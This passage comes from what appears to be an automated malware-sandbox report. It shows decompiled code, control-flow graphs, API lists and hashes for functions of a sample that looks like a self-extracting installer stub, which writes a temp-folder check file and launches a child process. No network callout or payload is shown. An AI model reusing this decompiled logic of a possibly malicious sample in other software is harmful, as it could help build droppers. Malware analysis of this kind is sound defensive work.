                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                                                                                                                                                                                                                                                • Instruction ID: d49b77bffc8b3a3f50410c9e8e88aa2efa433491c4373ba15a07496f1dd30b04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90116335902228FFDB20DB979C0DDFF7EFCEB056A1F114195B989A2000D6714A44D6A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E6A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 533 10e6a60-10e6a91 call 10e7155 call 10e7208 GetStartupInfoW 539 10e6a93-10e6aa2 533->539 540 10e6abc-10e6abe 539->540 541 10e6aa4-10e6aa6 539->541 544 10e6abf-10e6ac5 540->544 542 10e6aaf-10e6aba Sleep 541->542 543 10e6aa8-10e6aad 541->543 542->539 543->544 545 10e6ac7-10e6acf _amsg_exit 544->545 546 10e6ad1-10e6ad7 544->546 547 10e6b0b-10e6b11 545->547 548 10e6ad9-10e6ae9 call 10e6c3f 546->548 549 10e6b05 546->549 551 10e6b2e-10e6b30 547->551 552 10e6b13-10e6b24 _initterm 547->552 553 10e6aee-10e6af2 548->553 549->547 554 10e6b3b-10e6b42 551->554 555 10e6b32-10e6b39 551->555 552->551 553->547 558 10e6af4-10e6b00 553->558 556 10e6b67-10e6b71 554->556 557 10e6b44-10e6b51 call 10e7060 554->557 555->554 560 10e6b74-10e6b79 556->560 557->556 566 10e6b53-10e6b65 557->566 561 10e6c39-10e6c3e call 10e724d 558->561 564 10e6b7b-10e6b7d 560->564 565 10e6bc5-10e6bc8 560->565 570 10e6b7f-10e6b81 564->570 571 10e6b94-10e6b98 564->571 567 10e6bca-10e6bd3 565->567 568 10e6bd6-10e6be3 _ismbblead 565->568 566->556 567->568 572 10e6be9-10e6bed 568->572 573 10e6be5-10e6be6 568->573 570->565 574 10e6b83-10e6b85 570->574 575 10e6b9a-10e6b9e 571->575 576 10e6ba0-10e6ba2 571->576 572->560 579 10e6c1e-10e6c25 572->579 573->572 574->571 580 10e6b87-10e6b8a 574->580 577 10e6ba3-10e6bbc call 10e2bfb 575->577 576->577 577->579 586 10e6bbe-10e6bbf exit 577->586 582 10e6c27-10e6c2d _cexit 579->582 583 10e6c32 579->583 580->571 584 10e6b8c-10e6b92 580->584 582->583 583->561 584->574 586->565
                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E010E7155();
				_push(0x58);
				_push(0x10e72b8);
				E010E7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x10e88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x10e88b0; // 0x2
						if(__eflags != 0) {
							 *0x10e81e4 = _t58;
							goto L13;
						} else {
							 *0x10e88b0 = _t58;
							_t37 = E010E6C3F(0x10e10b8, 0x10e10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L010E6FF4();
						L13:
						_t68 =  *0x10e88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x10e10b4);
							_push(0x10e10ac);
							L010E7202();
							 *0x10e88b0 = 2;
						}
						if(_t53 == 0) {
							 *0x10e88ac = 0;
						}
						_t71 =  *0x10e88b4;
						if( *0x10e88b4 != 0 && E010E7060(_t71, 0x10e88b4) != 0) {
							_t60 =  *0x10e88b4; // 0x0
							 *0x10ea288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E010E2BFB(0x10e0000, 0, _t59); // executed
							 *0x10e81e0 = _t30;
							__eflags =  *0x10e81f8;
							if( *0x10e81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x10e81e4;
							if( *0x10e81e4 == 0) {
								__imp___cexit();
								_t30 =  *0x10e81e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E010E724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                                0x010e6a60
                                                                                                                                                                                                                                                0x010e6a6a
                                                                                                                                                                                                                                                0x010e6a6c
                                                                                                                                                                                                                                                0x010e6a71
                                                                                                                                                                                                                                                0x010e6a78
                                                                                                                                                                                                                                                0x010e6a7f
                                                                                                                                                                                                                                                0x010e6a85
                                                                                                                                                                                                                                                0x010e6a8e
                                                                                                                                                                                                                                                0x010e6a91
                                                                                                                                                                                                                                                0x010e6a93
                                                                                                                                                                                                                                                0x010e6a9c
                                                                                                                                                                                                                                                0x010e6aa2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6aa6
                                                                                                                                                                                                                                                0x010e6ab4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6aa8
                                                                                                                                                                                                                                                0x010e6aaa
                                                                                                                                                                                                                                                0x010e6aab
                                                                                                                                                                                                                                                0x010e6aab
                                                                                                                                                                                                                                                0x010e6abf
                                                                                                                                                                                                                                                0x010e6abf
                                                                                                                                                                                                                                                0x010e6ac5
                                                                                                                                                                                                                                                0x010e6ad1
                                                                                                                                                                                                                                                0x010e6ad7
                                                                                                                                                                                                                                                0x010e6b05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6ad9
                                                                                                                                                                                                                                                0x010e6ad9
                                                                                                                                                                                                                                                0x010e6ae9
                                                                                                                                                                                                                                                0x010e6af0
                                                                                                                                                                                                                                                0x010e6af2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6af4
                                                                                                                                                                                                                                                0x010e6af4
                                                                                                                                                                                                                                                0x010e6afb
                                                                                                                                                                                                                                                0x010e6afb
                                                                                                                                                                                                                                                0x010e6af2
                                                                                                                                                                                                                                                0x010e6ac7
                                                                                                                                                                                                                                                0x010e6ac7
                                                                                                                                                                                                                                                0x010e6ac9
                                                                                                                                                                                                                                                0x010e6b0b
                                                                                                                                                                                                                                                0x010e6b0b
                                                                                                                                                                                                                                                0x010e6b11
                                                                                                                                                                                                                                                0x010e6b13
                                                                                                                                                                                                                                                0x010e6b18
                                                                                                                                                                                                                                                0x010e6b1d
                                                                                                                                                                                                                                                0x010e6b24
                                                                                                                                                                                                                                                0x010e6b24
                                                                                                                                                                                                                                                0x010e6b30
                                                                                                                                                                                                                                                0x010e6b39
                                                                                                                                                                                                                                                0x010e6b39
                                                                                                                                                                                                                                                0x010e6b3b
                                                                                                                                                                                                                                                0x010e6b42
                                                                                                                                                                                                                                                0x010e6b57
                                                                                                                                                                                                                                                0x010e6b5f
                                                                                                                                                                                                                                                0x010e6b65
                                                                                                                                                                                                                                                0x010e6b65
                                                                                                                                                                                                                                                0x010e6b67
                                                                                                                                                                                                                                                0x010e6b6c
                                                                                                                                                                                                                                                0x010e6b6e
                                                                                                                                                                                                                                                0x010e6b71
                                                                                                                                                                                                                                                0x010e6b74
                                                                                                                                                                                                                                                0x010e6b74
                                                                                                                                                                                                                                                0x010e6b79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6b7d
                                                                                                                                                                                                                                                0x010e6b81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6b83
                                                                                                                                                                                                                                                0x010e6b8c
                                                                                                                                                                                                                                                0x010e6b8d
                                                                                                                                                                                                                                                0x010e6b90
                                                                                                                                                                                                                                                0x010e6b90
                                                                                                                                                                                                                                                0x010e6b83
                                                                                                                                                                                                                                                0x010e6b81
                                                                                                                                                                                                                                                0x010e6b94
                                                                                                                                                                                                                                                0x010e6b98
                                                                                                                                                                                                                                                0x010e6ba2
                                                                                                                                                                                                                                                0x010e6b9a
                                                                                                                                                                                                                                                0x010e6b9a
                                                                                                                                                                                                                                                0x010e6b9a
                                                                                                                                                                                                                                                0x010e6ba3
                                                                                                                                                                                                                                                0x010e6bab
                                                                                                                                                                                                                                                0x010e6bb0
                                                                                                                                                                                                                                                0x010e6bb5
                                                                                                                                                                                                                                                0x010e6bbc
                                                                                                                                                                                                                                                0x010e6bbf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6bbf
                                                                                                                                                                                                                                                0x010e6c1e
                                                                                                                                                                                                                                                0x010e6c25
                                                                                                                                                                                                                                                0x010e6c27
                                                                                                                                                                                                                                                0x010e6c2d
                                                                                                                                                                                                                                                0x010e6c2d
                                                                                                                                                                                                                                                0x010e6c32
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6bc5
                                                                                                                                                                                                                                                0x010e6bc5
                                                                                                                                                                                                                                                0x010e6bc8
                                                                                                                                                                                                                                                0x010e6bcc
                                                                                                                                                                                                                                                0x010e6bce
                                                                                                                                                                                                                                                0x010e6bce
                                                                                                                                                                                                                                                0x010e6bd1
                                                                                                                                                                                                                                                0x010e6bd3
                                                                                                                                                                                                                                                0x010e6bd3
                                                                                                                                                                                                                                                0x010e6bd6
                                                                                                                                                                                                                                                0x010e6bda
                                                                                                                                                                                                                                                0x010e6be1
                                                                                                                                                                                                                                                0x010e6be3
                                                                                                                                                                                                                                                0x010e6be5
                                                                                                                                                                                                                                                0x010e6be5
                                                                                                                                                                                                                                                0x010e6be6
                                                                                                                                                                                                                                                0x010e6be6
                                                                                                                                                                                                                                                0x010e6be9
                                                                                                                                                                                                                                                0x010e6bea
                                                                                                                                                                                                                                                0x010e6bea
                                                                                                                                                                                                                                                0x010e6b74
                                                                                                                                                                                                                                                0x010e6c39
                                                                                                                                                                                                                                                0x010e6c3e
                                                                                                                                                                                                                                                0x010e6c3e
                                                                                                                                                                                                                                                0x010e6abe
                                                                                                                                                                                                                                                0x010e6abe
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetCurrentProcessId.KERNEL32 ref: 010E7191
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetCurrentThreadId.KERNEL32 ref: 010E719A
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetTickCount.KERNEL32 ref: 010E71A3
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,010E72B8,00000058), ref: 010E6A7F
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 010E6AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 010E6AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 010E6B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 010E6B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 010E6BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 010E6BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                                                                                                                                                                                                                                                • Instruction ID: 1abba974472e59e35631f0bba7cf7dfe9aa5dc7316f4ea2784cfc9b2f2562fd7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E141C735A44365CFDF719B6FF90C76E7BE4AB54B10F14415EE9C19B280CB7A84808B80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 587 10e58c8-10e58d5 588 10e58d8-10e58dd 587->588 588->588 589 10e58df-10e58f1 LocalAlloc 588->589 590 10e5919-10e5959 call 10e1680 call 10e658a CreateFileA LocalFree 589->590 591 10e58f3-10e5901 call 10e44b9 589->591 594 10e5906-10e5910 call 10e6285 590->594 601 10e595b-10e596c CloseHandle GetFileAttributesA 590->601 591->594 600 10e5912-10e5918 594->600 601->594 602 10e596e-10e5970 601->602 602->594 603 10e5972-10e597b 602->603 603->600
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E010E58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E010E1680(_t20, _t36, _t33);
					E010E658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x10e9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x10e9124 = E010E6285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                                0x010e58cd
                                                                                                                                                                                                                                                0x010e58d1
                                                                                                                                                                                                                                                0x010e58d3
                                                                                                                                                                                                                                                0x010e58d5
                                                                                                                                                                                                                                                0x010e58d8
                                                                                                                                                                                                                                                0x010e58d8
                                                                                                                                                                                                                                                0x010e58da
                                                                                                                                                                                                                                                0x010e58db
                                                                                                                                                                                                                                                0x010e58e1
                                                                                                                                                                                                                                                0x010e58ed
                                                                                                                                                                                                                                                0x010e58f1
                                                                                                                                                                                                                                                0x010e591e
                                                                                                                                                                                                                                                0x010e592c
                                                                                                                                                                                                                                                0x010e5943
                                                                                                                                                                                                                                                0x010e594a
                                                                                                                                                                                                                                                0x010e594d
                                                                                                                                                                                                                                                0x010e5953
                                                                                                                                                                                                                                                0x010e5959
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e595b
                                                                                                                                                                                                                                                0x010e595c
                                                                                                                                                                                                                                                0x010e5963
                                                                                                                                                                                                                                                0x010e596c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5972
                                                                                                                                                                                                                                                0x010e5974
                                                                                                                                                                                                                                                0x010e597a
                                                                                                                                                                                                                                                0x010e597a
                                                                                                                                                                                                                                                0x010e596c
                                                                                                                                                                                                                                                0x010e58f3
                                                                                                                                                                                                                                                0x010e5901
                                                                                                                                                                                                                                                0x010e5906
                                                                                                                                                                                                                                                0x010e590b
                                                                                                                                                                                                                                                0x010e5910
                                                                                                                                                                                                                                                0x010e5910
                                                                                                                                                                                                                                                0x010e5918

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E58E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-3705647674
                                                                                                                                                                                                                                                • Opcode ID: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                                                                                                                                                                                                                                                • Instruction ID: 9ca697ab06736a231533094b8cfa5b77cc717e1bc5258c7ce378bb753055aecc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50112671700211AFD7345E7B6C4CADB7EDDDF8A664B000A59B5C5D72C4CA75D80587A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E3FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 631 10e3fef-10e4010 632 10e410a-10e411a call 10e6ce0 631->632 633 10e4016-10e403b CreateProcessA 631->633 634 10e40c4-10e4101 call 10e6285 GetLastError FormatMessageA call 10e44b9 633->634 635 10e4041-10e406e WaitForSingleObject GetExitCodeProcess 633->635 647 10e4106 634->647 637 10e4070-10e4077 635->637 638 10e4091 call 10e411b 635->638 637->638 642 10e4079-10e407b 637->642 646 10e4096-10e40b8 CloseHandle * 2 638->646 642->638 645 10e407d-10e4089 642->645 645->638 648 10e408b 645->648 649 10e40ba-10e40c0 646->649 650 10e4108 646->650 647->650 648->638 649->650 651 10e40c2 649->651 650->632 651->647
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E010E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x10e8004; // 0x71a8563c
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E010E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x10e9124 = E010E6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E010E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x10e8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x10e9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x10e9a2c = _t44;
						}
					}
				}
				E010E411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x10e9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                                0x010e3fef
                                                                                                                                                                                                                                                0x010e3ffa
                                                                                                                                                                                                                                                0x010e4001
                                                                                                                                                                                                                                                0x010e4008
                                                                                                                                                                                                                                                0x010e400a
                                                                                                                                                                                                                                                0x010e400b
                                                                                                                                                                                                                                                0x010e4010
                                                                                                                                                                                                                                                0x010e410a
                                                                                                                                                                                                                                                0x010e411a
                                                                                                                                                                                                                                                0x010e411a
                                                                                                                                                                                                                                                0x010e401c
                                                                                                                                                                                                                                                0x010e401d
                                                                                                                                                                                                                                                0x010e401e
                                                                                                                                                                                                                                                0x010e401f
                                                                                                                                                                                                                                                0x010e4033
                                                                                                                                                                                                                                                0x010e403b
                                                                                                                                                                                                                                                0x010e40ca
                                                                                                                                                                                                                                                0x010e40e9
                                                                                                                                                                                                                                                0x010e40f8
                                                                                                                                                                                                                                                0x010e4101
                                                                                                                                                                                                                                                0x010e4106
                                                                                                                                                                                                                                                0x010e4106
                                                                                                                                                                                                                                                0x010e4108
                                                                                                                                                                                                                                                0x010e4108
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4108
                                                                                                                                                                                                                                                0x010e4049
                                                                                                                                                                                                                                                0x010e405c
                                                                                                                                                                                                                                                0x010e4062
                                                                                                                                                                                                                                                0x010e4068
                                                                                                                                                                                                                                                0x010e406e
                                                                                                                                                                                                                                                0x010e4070
                                                                                                                                                                                                                                                0x010e4077
                                                                                                                                                                                                                                                0x010e407f
                                                                                                                                                                                                                                                0x010e4089
                                                                                                                                                                                                                                                0x010e408b
                                                                                                                                                                                                                                                0x010e408b
                                                                                                                                                                                                                                                0x010e4089
                                                                                                                                                                                                                                                0x010e4077
                                                                                                                                                                                                                                                0x010e4091
                                                                                                                                                                                                                                                0x010e409c
                                                                                                                                                                                                                                                0x010e40a8
                                                                                                                                                                                                                                                0x010e40b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e40c2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e40c2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010E4033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010E4049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 010E405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 010E409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 010E40A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E40DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E40E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
